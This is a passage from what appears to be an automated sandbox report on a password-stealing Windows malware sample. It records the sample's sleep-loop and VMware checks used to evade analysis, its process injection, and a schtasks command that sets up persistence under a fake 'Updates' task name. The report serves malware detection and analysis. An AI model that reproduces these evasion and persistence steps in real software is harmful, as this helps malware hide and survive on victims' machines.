                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -99859s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5324Thread sleep count: 9738 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -99750s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -99640s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -99531s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -99421s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -99301s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -99156s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -99015s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -98906s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -98781s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -98671s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -98546s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -98421s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -98310s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -98198s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -98077s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -97953s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -97828s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -97718s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -97593s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -97473s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -97356s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -97203s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -97093s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -96968s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -96859s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -96734s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -96623s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -96484s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -96359s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -96250s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -96138s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -96023s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -95738s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -95623s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe TID: 5336Thread sleep time: -95416s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeWindow / User API: threadDelayed 9863Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeWindow / User API: threadDelayed 9738Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 99890Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 99780Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 99666Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 99505Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 99343Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 99234Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 99123Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 99014Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 98905Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 98794Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 98686Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 98577Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 98467Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 98357Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 98249Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 98140Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 98027Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 97921Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 97810Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 97700Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 97593Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 97479Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 97368Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 97249Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 97139Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 97030Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 96921Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 96812Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 96686Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 96574Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 96452Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 96336Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 96203Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 96093Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 95984Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 95874Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 95765Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 95656Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 95546Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 95437Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 95326Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 95218Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 95109Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 94999Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 94890Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 94777Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 94671Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 94559Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeThread delayed: delay time: 94453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 99859Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 99750Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 99640Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 99531Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 99421Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 99301Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 99156Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 99015Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 98906Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 98781Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 98671Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 98546Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 98421Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 98310Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 98198Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 98077Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 97953Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 97828Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 97718Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 97593Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 97473Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 97356Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 97203Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 97093Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 96968Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 96859Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 96734Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 96623Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 96484Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 96359Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 96250Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 96138Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 96023Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 95738Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 95623Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeThread delayed: delay time: 95416Jump to behavior
                Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: IwUNvHNy.exe, 0000000B.00000002.420173402.000000000293A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: IwUNvHNy.exe, 0000000E.00000002.522868815.0000000001504000.00000004.00000020.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000003.478235783.00000000014EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeCode function: 10_2_06955780 LdrInitializeThunk,10_2_06955780
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeMemory written: C:\Users\user\AppData\Roaming\IwUNvHNy.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmpJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe {path}Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exeProcess created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe {path}Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
